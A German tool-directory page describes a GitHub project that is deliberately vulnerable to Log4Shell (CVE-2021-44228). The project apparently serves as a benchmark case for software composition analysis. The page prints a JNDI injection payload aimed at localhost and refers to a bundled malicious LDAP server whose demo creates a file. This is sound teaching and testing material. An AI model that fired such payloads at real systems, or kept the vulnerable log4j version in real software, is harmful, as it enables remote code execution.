Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
l4j-tp1 — JEE-Webprojekt mit Log4Shell-Schwachstelle (CVE-2021-44228) | Kitploit
Tools/GitHubGitHub/scabench/l4j-tp1
SchwachstellenanalyseExploitationWebsicherheitLieferkettensicherheitLernen & BildungLabs & Praxis
GitHubscabench/l4j-tp1

l4j-tp1

JEE-Webprojekt mit Log4Shell-Schwachstelle (CVE-2021-44228)

Repository anzeigen
5vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4shell echtes Positiv

Dies ist ein einfaches Webprojekt mit einer log4shell-Schwachstelle. Das Projekt definiert einen einfachen scabench.HelloWorldService-GET-Dienst, der einen einfachen Textstring hello world zurückgibt. Der Dienst erwartet keine Parameter, und wenn Parameter auftreten, wird ein Fehler protokolliert.

Die verwundbare Abhängigkeit ist org.apache.logging.log4j:log4j-core:2.14.1, die Schwachstelle ist CVE-2021-44228.

Demonstration der Schwachstelle mit einem Test

Dies erfordert Unix oder macOS. Es ist einfach, dieses Projekt auf Windows zu portieren.

Ein Unit-Test ist enthalten, um die Schwachstelle zu demonstrieren. Der Test benötigt einen LDAP-Server, der verwundbaren Code bereitstellt. Das entsprechende ausführbare Programm wird vom Projekt bereitgestellt; es ist in einem separaten Projekt https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept basierend auf https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept definiert. Die Test-Fixture übernimmt das Starten und Stoppen des LDAP-Servers.

Der Test erstellt eine Datei foo basierend auf einem Befehl, der in den Code des LDAP-Servers eingebettet ist, mit dem sich log4j verbindet (touch foo). Dieser Server kann von einem Angreifer kontrolliert werden.

Tool herunterladen

Um den Test auszuführen, baue das Projekt mit mvn test.

Vorführen der Schwachstelle durch Ausführen der Anwendung

  1. starte den eingebetteten Webserver: mvn jetty:run
  2. starte den enthaltenen LDAP-Server: java -jar dodgy-ldap-server.jar (der verwundbare Code lädt Java-Code von diesem Server herunter)
  3. öffne den Browser unter http://localhost:8080/, diese Seite enthält ein vorausgefülltes Formular mit einer schädlichen Payload ${jndi:ldap://127.0.0.1/exe}
  4. sende dieses Formular ab
  5. dadurch wird eine Datei foo auf dem Server erstellt

Durchführen von Software-Composition-Analysen

Es gibt mehrere Shell-Skripte, um verschiedene Analysen auszuführen; Ergebnisberichte finden sich in scan-results.

Generieren der SBOM

Die pom.xml enthält ein Plugin, um eine SBOM im CycloneDX-Format zu erzeugen. Führe dazu mvn cyclonedx:makePackageBom aus. Die SBOM befindet sich in target/ im json- und xml-Format.